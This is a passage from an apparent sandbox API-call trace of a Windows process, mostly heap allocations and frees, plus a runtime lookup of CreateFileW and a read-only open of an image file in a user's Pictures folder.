hHeap=0x1780000) returned 1 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.041] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0090.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0090.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.042] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0090.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0090.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0090.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0090.043] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rk8a.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0090.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0090.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0090.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0090.045] FreeLibrary (hLibModule=0x772d0000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0090.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.047] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.047] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.047] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0090.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, 